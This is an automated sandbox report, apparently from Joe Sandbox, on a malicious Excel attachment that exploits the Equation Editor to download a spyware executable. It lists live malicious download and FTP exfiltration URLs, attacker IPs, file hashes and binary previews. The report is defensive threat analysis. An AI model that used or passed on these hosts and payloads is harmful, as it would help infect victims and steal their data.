C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mon[1].exe	100%	Joe Sandbox ML
C:\Users\Public\Regasm_svchost.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
6.0.Regasm_svchost.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://ZSkVPd.com	0%	Avira URL Cloud	safe
http://198.12.89.152/mon/mon.exehhC:	100%	Avira URL Cloud	malware
ftp://ftp.alonsorojasmudanzasnacionales.com/okok	100%	Avira URL Cloud	malware
http://198.12.89.152/mon/mon.exe	100%	Avira URL Cloud	malware
http://77qlBFDgeMeBhXCCMul.org	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	0%	URL Reputation	safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	0%	URL Reputation	safe

Name	Malicious	Antivirus Detection	Reputation
http://198.12.89.152/mon/mon.exe	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	Regasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://ZSkVPd.com	Regasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://198.12.89.152/mon/mon.exehhC:	EQNEDT32.EXE, 00000002.00000002.980379533.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
ftp://ftp.alonsorojasmudanzasnacionales.com/okok	Regasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Regasm_svchost.exe, 00000006.00000002.1174896725.000000000262C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://77qlBFDgeMeBhXCCMul.org	Regasm_svchost.exe, 00000006.00000002.1174896725.000000000262C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	Regasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	Regasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
198.12.89.152	unknown	United States		36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	680486
Start date and time: 08/08/202217:25:26	2022-08-08 17:25:26 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Quotation - Optical Eyeglasses.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winXLSX@6/23@0/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 95% Number of executed functions: 218 Number of non-executed functions: 5
Cookbook Comments:	Found application associated with file extension: .xlsx Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:26:43	API Interceptor	173x Sleep call for process: EQNEDT32.EXE modified
17:26:54	API Interceptor	830x Sleep call for process: Regasm_svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
198.12.89.152	SWIFT COPY.xlsx	Get hash	malicious	Browse	198.12.89.152/po/AunDB9JCmWfIx5F.exe
198.12.89.152	PO.xlsx	Get hash	malicious	Browse	198.12.89.152/po/lQ7k4CB3hzs4MY7.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-COLOCROSSINGUS	SecuriteInfo.com.Exploit.CVE-2017-0199.02.Gen.27968.xlsx	Get hash	malicious	Browse	192.3.122.162
	gen_signed.apk	Get hash	malicious	Browse	192.227.134.72
	gen_signed.apk	Get hash	malicious	Browse	192.227.134.72
	SHIPMENT ADVICE OF HBL-FCBD22135.exe	Get hash	malicious	Browse	198.23.144.27
	gen_signed.apk	Get hash	malicious	Browse	192.227.134.72
	gen_signed.apk	Get hash	malicious	Browse	192.227.134.72
	zpDlSEHN1H	Get hash	malicious	Browse	107.172.24.174
	Cm2k7CYaAn	Get hash	malicious	Browse	192.210.189.179
	gen_signed.apk	Get hash	malicious	Browse	192.227.134.72
	gen_signed.apk	Get hash	malicious	Browse	192.227.134.72
	yHXdbnUZNz	Get hash	malicious	Browse	172.245.20.69
	Proof_of_Payment.xlsx	Get hash	malicious	Browse	107.172.76.136
	STS5492338072022.xlsx	Get hash	malicious	Browse	107.173.143.5
	sScKDrSyhO	Get hash	malicious	Browse	107.173.209.156
	DHL_AWB.docx	Get hash	malicious	Browse	198.23.207.54
	Universalmiddel169.exe	Get hash	malicious	Browse	107.173.81.61
	Order_Details.xlsx	Get hash	malicious	Browse	198.23.174.121
	quotation docx lnk.lnk	Get hash	malicious	Browse	23.94.191.90
	test_240.doc	Get hash	malicious	Browse	192.3.152.171
	UPDATED SOA.docx	Get hash	malicious	Browse	192.3.13.61

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	896512
Entropy (8bit):	7.735833585263268
Encrypted:	false
SSDEEP:	12288:YZkGxgV2iNq+1MCVjjwDcYj5DHXYQn1qLbxhbJE3d7h4eAwRXIbUDbLDuXkjZc0I:KkGxgV10Ctw1jQ/xhbJEtOe9IbUDHDl
MD5:	A6439DBBF3F848EB6F83494C5C75A7A6
SHA1:	8381D3D1AC7CAA3BD8033F17B36C8D0ABE54480E
SHA-256:	1D806C678B4CC86F4BCB769B1D1E613D0AF28336DBAD4FACD0A04ED959D9EDBA
SHA-512:	AC573AEE0DC0C2C4E3439B6BC3AADCB244310E1713E2E27DA5B752DE6C2E93847002263B11B70D9CD8889D1E81CAA90DA53720909C789755702AF9D132173157
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
IE Cache URL:	http://198.12.89.152/mon/mon.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............0.................. ........@.. ....................... ............@.....................................S.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......................(....!...........................................0..............0.............K...%.r...p.%.rK..p.%.rY..p.}......}.....(.... .m/. ..~fa%..^E........5.......d.......E...+b...(..... ~...Z .f.=a+..{.....(...... .,d.Z ..{a+... ..c.Z &.8Va+...{.....(..... ...zZ .77.a8u...~....t.....{....(....&.0..:........ ..h ...>a%..^E................+..(..... 6;..Z Qb..a+.....0..............0.................{....(.....(..... .... .rG.a%....^E................v...U.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\109ABFC7.wmf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ms-windows metafont .wmf
Category:	dropped
Size (bytes):	10770
Entropy (8bit):	5.171884184642559
Encrypted:	false
SSDEEP:	192:HeQeAkykQp+2m+xLu4jA+6+rtBLPQgkUeKCrkKnU7eBiRUgQDMzvudxhnGu7+mRp:He5AkykQp+2NxLLjA+6+rtBLNkUeKC3z
MD5:	DAE5E2360C20E41A74B50234EAF58B2D
SHA1:	A310025AAC3C93073F16BEF2056A5C398D9A41BA
SHA-256:	D5106547F8BF1B9CAB7C24DA1B648CAD51D96120B00B9AC07AF384FEB750D187
SHA-512:	30EEDD5DCB85B2FF225B165A9B915FA06B787A78BF28A54CB46A7684FE9D94D783E2FFBB800BAA64464FDD56A112F74FB91567F8AA65EC5B68C670289B932912
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.....H.....}........S........................}.H.......5.K...................-...................".....-...........................".....-...........I.B.......-...............$...........M...\|...................X.......................?...`.............}...r...g...\.".P.7.D.I.7.Z.+.i...u.......................................u...i.w.Z.j.I.].7.Q.".E...9.......#.............`...?.......................X...................\|...M...................`...2...................Y...1...................z...Z...;.........#.......9...E...Q...]...j.r.w.e...[...S...M...I...H...I...M...S...[...e...r.....+...7...D...P...\...g...r...}.;...Z...z...................1...Y...................2...`.................................-...............-.......-............z........-...........,...$.....M...Q...U...}.........2...............w.a...5...!...%.B...R.............%...M.....-...............-.......-............B........-...........$...$.........d...C..."......... .....d.!...&.../.../.S.X.?...N.............-.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1797FF2.wmf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ms-windows metafont .wmf
Category:	dropped
Size (bytes):	9142
Entropy (8bit):	5.831641085312416
Encrypted:	false
SSDEEP:	192:sjsCW0P2qkxIn67FhDbOMQRJsXaZjwIawoLevwFtCJo/0HR70Q/XGI+yaIWS4g4D:sjsV0PNkW67FhDaMQfsXaWIawT4FtCJg
MD5:	EDFEF94C6F9587BC790758D5D9693D50
SHA1:	76FF70799E5EF874B611264C4DB94164D050A3F7
SHA-256:	ED699D5F9576FDCF0E39EF03C10F2CEA8890B4942DD7AB78BF1DE07676962FD5
SHA-512:	11F535B4A9A5547E9FB3F1F258486569F5028186F1FD18BF35C060EAA4886D67CB7054CA81289FACC9133D25FF268D6D2A12E7230A9998FAAEB1FAF002AF20AB
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.....H.....U.....................b...........U.H.......E.....................-...................".....-...........................".....-.....................-...............$...H.U.H.........U.H.U...................-.......-.......-............h........-...............$...........................-...............-.......-...........[.........-...............$.D...t.................t...a...N...;...'...............................w..._...G.../.........................!.\|.$.b.&.G.).,.+...,...-......./.../.../.e...G.-.).,...*...(...%...".....}...a...F...+...........................{...d...M...7...!.................................t.....-...............-.......-............h........-...............$.....h.C.h.C.........h.....-...............-.......-............h........-...............$...........................-...............-.......-............h........-...........b...$./.............2...Q...o.........................w.4.l.N._.g.S...F...8...X...c.q.m.].w.I...4.......................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3A41A35E.wmf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ms-windows metafont .wmf
Category:	dropped
Size (bytes):	12600
Entropy (8bit):	5.406932409911072
Encrypted:	false
SSDEEP:	384:Iz4+CJDxb6kHwPh86pEnCHuNMK4fed1dLUHLq65CgO2GmmQYbh3xpJGvuCeJWlnx:IrCJDxb6kHwPh86pEnCHuNMK4fe7dL2F
MD5:	E36EE51F1EC331B2FD1E62230CE4CDC9
SHA1:	23C604663C21D30FCA671802EF5DCE892A32C79A
SHA-256:	90CABD958AF7364A82D304E222B295BDE98A2FE5500037ACEA267FA7CF098E11
SHA-512:	DD26855CE91F02E42B4352C5264CA00082B5766558689A704346C89703942A21E053B2E0C8F0B19D469973BACA28526929AAE75303F5D17B71CBFF654297BA89
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.....p. .(.........fT............6.............p.......9.....................-...................".....-...........................".....-.....................-...............$.f.~.L.\|.N.{.P.y.R.w.T.s.O.p.K.l.F.h.B.d.=.a.9.\.4.X./.N.%.D...:.../...%.................................................$.......9...C.u.M.j.W._.a.T.k.H.t.=.}.1...%.............................................................................{.&.t.1.m.<.d.G.\.R.R.\.I.g.?.q.5.{.+...!.........................................................$.../...9...C...L...U...[...a...h.&.n...t.5.{.;...B...H...J...L...M.~.L...................-...............-.......-.....................-...............$.f...P...b...t.........$.../...:...E...W...c...g.c.f.;._...S...C.../...4...9...>...C...G...L...S...Z...c...l...w.0...B...S...d...t...........................n...I...&...............................................................&.#.3.4.?.F.K.W.U.j._.\|.i...q...y...U...4.....{...g...Q...7.......'...4...A...O...Z...c...h.{.i.v.b.o.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3AB4071C.wmf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ms-windows metafont .wmf
Category:	dropped
Size (bytes):	30838
Entropy (8bit):	5.787956459094822
Encrypted:	false
SSDEEP:	768:nMGzaVVMT1poZEPXkwr0JG1+BZiuJPzMFE5O5A71uWZ1ldyKuDWTSWTiRYWiBSjt:DlCXap6we73MRT53
MD5:	31B4D83D0B440E38EB9C724FD362C679
SHA1:	C6CDB84DB8608C87BD5F3FABCA9AAD67C36B0CD9
SHA-256:	AA78BC64D62F0DFC44611F0EAAEE8551C81F82A7C334073B431C96D2097900EE
SHA-512:	D1877808772B6AEA5A20316B234884383D1165716C98EE8B8C32AE6238FB1454662F1DEE88C5FFAF645ABFAA66C47C889BB44FC59F3DD780884FA590B865D1DF
Malicious:	false
Preview:	.........H.J........S......0<................J.........<.L...................-...................".....-...........................".....-....................-...............$.....J.I...I.........J...................-...............-.......-.......-...............$...<...<.....>.....<.......-.......-.......-....................-...............$.....,.&...&. .......,.....-...............-.......-.......-...............$.....0.....3...3.....0.....-.......-.......-....................-...............$.....G.M...M.........G.....-...............-.......-....................-...............$.....G.M...M.........G.....-...............-.......-....................-...............$.A.........................4. .H.+.[.9.k.G.z.W...h...y....................................z.;.k.K.[.Y.H.g.4.r...\|.........................p...W...?...).\|...r...g...Y...K...;......................................y...h...W...G...9...+... .)...?...W...p...............-...............-.......-....................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5E39D4D0.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 114 x 111, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	9007
Entropy (8bit):	7.965803762230949
Encrypted:	false
SSDEEP:	192:xDL+FFfJ6pI4ySj0Qxd2ZSgFGOkBeNn+SG7J2r1KCYZ19:xv+DfJ6K4BlX7I1+SQS7Yh
MD5:	A21ED528A4278D2D5C5518576B119CB1
SHA1:	581711E69D65B716A391510C48F77C420453ECBD
SHA-256:	81C1CD8E58D3B4F5EC76BFC6436EC2FDF1D3B5233AEC0CD6C6E5FE9B424C65C9
SHA-512:	3A360478C6532545062CB0C5E1E7F07CD040D67665248FF1BD253689B2D0C8EB8FA507471626674BBBD8227F98873FEA6A046382FBA7739E4D4286C42D938729
Malicious:	false
Preview:	.PNG........IHDR...r...o.....0..8....sRGB....... .IDATx^........t..3.......dy..7....5.DQDL4.hp.AE.Wp.z...Q.._4".......e..DA....f...U.LM.=./...s....k.....w.-.u]...{?.Z...{....7..W......E.>}.... [...M=5.1..]fcR....N.....c#.=9q............b....5u.)...M.Y.....%..^w=.......m...}....&8....~.....m.z...< ...7....1...o.!kj..j.X..{.....h.#....;P..o`..x.-..9W.. +...?e/.Cm.\|.7.jL..p]..:...n..j.o!1R.F.ad...c.C...f..MCL.V......hx4a.....@.[.D.S.?..E..:w...]..#..........cg..t..-./~Oq.."V.=...@.=EBo...w. .\|....JrE.~.K...%..As..0.w.c../`6#F.V.j...ea...z....2.0.A.a.....)0.O..:.tOl.P....8.q.&..:!.ir....4.@......D...hn..={.m[..8.....bi6@....W........[[...hH.8...%V.....k. ...!.].x.l0.q.Y...8...qa..v]..$\|..j~\|$.k.k.............>..@F.a..'QTS.#.E.........X...V...:...(..G\..`..5....[....p..R...h.......:4..u..5..&...A..q.u...cq..\S1P@....H.;....^}..c.-..'..D..=..t.Gs.u0..U...D.a...#.P(F.....W..x...k........Y..g....,;J..A.mB..k.sI.}QL...Rq.q.n.00...[....:......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6044B544.wmf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ms-windows metafont .wmf
Category:	dropped
Size (bytes):	30838
Entropy (8bit):	5.787956459094822
Encrypted:	false
SSDEEP:	768:nMGzaVVMT1poZEPXkwr0JG1+BZiuJPzMFE5O5A71uWZ1ldyKuDWTSWTiRYWiBSjt:DlCXap6we73MRT53
MD5:	31B4D83D0B440E38EB9C724FD362C679
SHA1:	C6CDB84DB8608C87BD5F3FABCA9AAD67C36B0CD9
SHA-256:	AA78BC64D62F0DFC44611F0EAAEE8551C81F82A7C334073B431C96D2097900EE
SHA-512:	D1877808772B6AEA5A20316B234884383D1165716C98EE8B8C32AE6238FB1454662F1DEE88C5FFAF645ABFAA66C47C889BB44FC59F3DD780884FA590B865D1DF
Malicious:	false
Preview:	.........H.J........S......0<................J.........<.L...................-...................".....-...........................".....-....................-...............$.....J.I...I.........J...................-...............-.......-.......-...............$...<...<.....>.....<.......-.......-.......-....................-...............$.....,.&...&. .......,.....-...............-.......-.......-...............$.....0.....3...3.....0.....-.......-.......-....................-...............$.....G.M...M.........G.....-...............-.......-....................-...............$.....G.M...M.........G.....-...............-.......-....................-...............$.A.........................4. .H.+.[.9.k.G.z.W...h...y....................................z.;.k.K.[.Y.H.g.4.r...\|.........................p...W...?...).\|...r...g...Y...K...;......................................y...h...W...G...9...+... .)...?...W...p...............-...............-.......-....................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67B5846D.wmf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ms-windows metafont .wmf
Category:	dropped
Size (bytes):	13394
Entropy (8bit):	5.102000191951563
Encrypted:	false
SSDEEP:	384:57kA2HxAhR/SyE7lxN4JVNxqdNVrvDCkC90t272X3+WRB7uea1jiRs36tRFVJBeB:57kA2HxAhR/SyEZxN4JVNxqBrvDCd0tw
MD5:	35B6242416DED72F4D2D5BA2C5403DFC
SHA1:	D2D50B0D18F99ED5B23A5932B8321D0543F8A5C3
SHA-256:	93A6FC6436D546AF2B6C6215A5E9D3A227503AEFEE117371EEBFACD0E92FC9F5
SHA-512:	5E528B0274CE7F59D4E682FB2F98E4C3846AA831DCDC9ED8B5CC2FE3F250BF824E19B3E35CE70B24F91D9736FD9B1E882A4D0BD359B2DED30C661EACACD4D842
Malicious:	false
Preview:	...........r.......YT............4...........r.........1.....................-...................".....-...........................".....-.....................-...............$.........r...r...........................-.......-.......-............?........-...............$...4...4...E...0...4.......-...............-.......-...........-.........-...............$...A...0...E...A...A.......-...............-.......-............?........-...............$...I...g...r.r.p.r.T...d...I.......-...............-.......-............?........-...............$.....r.r.r.g...4.....I...........r.....-...............-.......-............?........-...............$...T...x.....I.d...T.......-...............-.......-............?........-...............$.........u.x...>.......`...........-...............-.......-...........-.........-...............$.........r...q.......r...r.........-...............-.......-...........-.........-...............$.........2.......q...q.............-...............-.......-.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\755CFE03.wmf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ms-windows metafont .wmf
Category:	dropped
Size (bytes):	5692
Entropy (8bit):	5.68725659600945
Encrypted:	false
SSDEEP:	96:qWx0ICjEkAs38UeWpOr6v1U/+nZyi2Wkv5i0x32+seq7BLImM6INLVCCT7l0eGY4:1xDmEkb8Umr6ve+nZb2f5i0x2+7q7dI8
MD5:	B33DD28C53DA7132F9C4687C8FF934AF
SHA1:	3762EDDF3184EB12CA65B35266FBEC29CA14DEAD
SHA-256:	1FA49081C44D54B1BE8A5D36C5C9271A7BC108F5141056723CF3EFEC4962D8BE
SHA-512:	7DB4EB02A988A223530B68A90524EB2C1AABBC3867EFC453476693D7B8562F598B31C5A10E8F3B7304FD278D6BBDFF3A569DBEA1B3B3B2E81A415FF1DA7165F5
Malicious:	false
Preview:	.....v. .).........PT..........................v.......J.....................-...................".....-...........................".....-....................-...............$.A.(.,.T....#.................=...\...x.....l...H..."...............y...M...!.................x.d.\.F.=.).....................T...(...................Y...5.....)...F...d...................!.x.M.v.y.x............."...H...l.............5...Y.............#....(.,...................-...............-.......-.....................-...............$.A.v.........{...q...b.E.P.i.:...!...................{...T. ..'...)...'... .{...Q...).....................i.j.E.T...B...3...)...".v. .J."...)...3...B...T...j.a...C...&.............)...Q...{..................T...{.........&...C...a.!...:...P...b...q...{.J...v.......-...............-.......-.....................-...............$.q...............................z...s...l...e...^...X...S...N...K...H...@...6...*.....4...L...a...v.................n...S...7.........P...P.s.;.v.(.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\85A0278A.wmf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ms-windows metafont .wmf
Category:	dropped
Size (bytes):	9142
Entropy (8bit):	5.831641085312416
Encrypted:	false
SSDEEP:	192:sjsCW0P2qkxIn67FhDbOMQRJsXaZjwIawoLevwFtCJo/0HR70Q/XGI+yaIWS4g4D:sjsV0PNkW67FhDaMQfsXaWIawT4FtCJg
MD5:	EDFEF94C6F9587BC790758D5D9693D50
SHA1:	76FF70799E5EF874B611264C4DB94164D050A3F7
SHA-256:	ED699D5F9576FDCF0E39EF03C10F2CEA8890B4942DD7AB78BF1DE07676962FD5
SHA-512:	11F535B4A9A5547E9FB3F1F258486569F5028186F1FD18BF35C060EAA4886D67CB7054CA81289FACC9133D25FF268D6D2A12E7230A9998FAAEB1FAF002AF20AB
Malicious:	false
Preview:	.....H.....U.....................b...........U.H.......E.....................-...................".....-...........................".....-.....................-...............$...H.U.H.........U.H.U...................-.......-.......-............h........-...............$...........................-...............-.......-...........[.........-...............$.D...t.................t...a...N...;...'...............................w..._...G.../.........................!.\|.$.b.&.G.).,.+...,...-......./.../.../.e...G.-.).,...*...(...%...".....}...a...F...+...........................{...d...M...7...!.................................t.....-...............-.......-............h........-...............$.....h.C.h.C.........h.....-...............-.......-............h........-...............$...........................-...............-.......-............h........-...........b...$./.............2...Q...o.........................w.4.l.N._.g.S...F...8...X...c.q.m.].w.I...4.......................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9C0AAE91.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 577 x 201, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	9920
Entropy (8bit):	7.680823551882418
Encrypted:	false
SSDEEP:	192:Kcqdy0jT4tDZ3hwGFnIgvEGHEZsuMerPnuM3/g+BYKYp0:pq7jstthwyIJGxuprWso+BYKYp0
MD5:	5AF9F8C3DCDB3C155D4283AA797BA7C3
SHA1:	226BE2FD7230B34B060FC1C31F5C1A131D0BD01E
SHA-256:	29C1F433CDDCB4DE1179CC18182E5052BDE598F560C36FFEAB7975E9F193297C
SHA-512:	FF06FCAEB0F521A45B18356DE4230FFBAD7687A183229841017888D6FB97A971BBAF4C98AD7CD46B78D0E3169DF4630DEE2DC155BAB75B903D9C024B45D71A1A
Malicious:	false
Preview:	.PNG........IHDR...A.........$x.1....sRGB.........gAMA......a.....pHYs..........+....&UIDATx^.M.V....B2....&tH.1.H...(.....:h..5.`$.h&.n.m}..d.u&.tP^......[...L#.@.t........cr....:.T.]U..:.....q..X..Z.vU.h..*.. ...@........1}Q...... ...8..A8.. ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9FBCD146.wmf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ms-windows metafont .wmf
Category:	dropped
Size (bytes):	12600
Entropy (8bit):	5.406932409911072
Encrypted:	false
SSDEEP:	384:Iz4+CJDxb6kHwPh86pEnCHuNMK4fed1dLUHLq65CgO2GmmQYbh3xpJGvuCeJWlnx:IrCJDxb6kHwPh86pEnCHuNMK4fe7dL2F
MD5:	E36EE51F1EC331B2FD1E62230CE4CDC9
SHA1:	23C604663C21D30FCA671802EF5DCE892A32C79A
SHA-256:	90CABD958AF7364A82D304E222B295BDE98A2FE5500037ACEA267FA7CF098E11
SHA-512:	DD26855CE91F02E42B4352C5264CA00082B5766558689A704346C89703942A21E053B2E0C8F0B19D469973BACA28526929AAE75303F5D17B71CBFF654297BA89
Malicious:	false
Preview:	.....p. .(.........fT............6.............p.......9.....................-...................".....-...........................".....-.....................-...............$.f.~.L.\|.N.{.P.y.R.w.T.s.O.p.K.l.F.h.B.d.=.a.9.\.4.X./.N.%.D...:.../...%.................................................$.......9...C.u.M.j.W._.a.T.k.H.t.=.}.1...%.............................................................................{.&.t.1.m.<.d.G.\.R.R.\.I.g.?.q.5.{.+...!.........................................................$.../...9...C...L...U...[...a...h.&.n...t.5.{.;...B...H...J...L...M.~.L...................-...............-.......-.....................-...............$.f...P...b...t.........$.../...:...E...W...c...g.c.f.;._...S...C.../...4...9...>...C...G...L...S...Z...c...l...w.0...B...S...d...t...........................n...I...&...............................................................&.#.3.4.?.F.K.W.U.j._.\|.i...q...y...U...4.....{...g...Q...7.......'...4...A...O...Z...c...h.{.i.v.b.o.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BB6E2A09.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 577 x 201, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	9920
Entropy (8bit):	7.680823551882418
Encrypted:	false
SSDEEP:	192:Kcqdy0jT4tDZ3hwGFnIgvEGHEZsuMerPnuM3/g+BYKYp0:pq7jstthwyIJGxuprWso+BYKYp0
MD5:	5AF9F8C3DCDB3C155D4283AA797BA7C3
SHA1:	226BE2FD7230B34B060FC1C31F5C1A131D0BD01E
SHA-256:	29C1F433CDDCB4DE1179CC18182E5052BDE598F560C36FFEAB7975E9F193297C
SHA-512:	FF06FCAEB0F521A45B18356DE4230FFBAD7687A183229841017888D6FB97A971BBAF4C98AD7CD46B78D0E3169DF4630DEE2DC155BAB75B903D9C024B45D71A1A
Malicious:	false
Preview:	.PNG........IHDR...A.........$x.1....sRGB.........gAMA......a.....pHYs..........+....&UIDATx^.M.V....B2....&tH.1.H...(.....:h..5.`$.h&.n.m}..d.u&.tP^......[...L#.@.t........cr....:.T.]U..:.....q..X..Z.vU.h..*.. ...@........1}Q...... ...8..A8.. ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C7CE848F.wmf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ms-windows metafont .wmf
Category:	dropped
Size (bytes):	10770
Entropy (8bit):	5.171884184642559
Encrypted:	false
SSDEEP:	192:HeQeAkykQp+2m+xLu4jA+6+rtBLPQgkUeKCrkKnU7eBiRUgQDMzvudxhnGu7+mRp:He5AkykQp+2NxLLjA+6+rtBLNkUeKC3z
MD5:	DAE5E2360C20E41A74B50234EAF58B2D
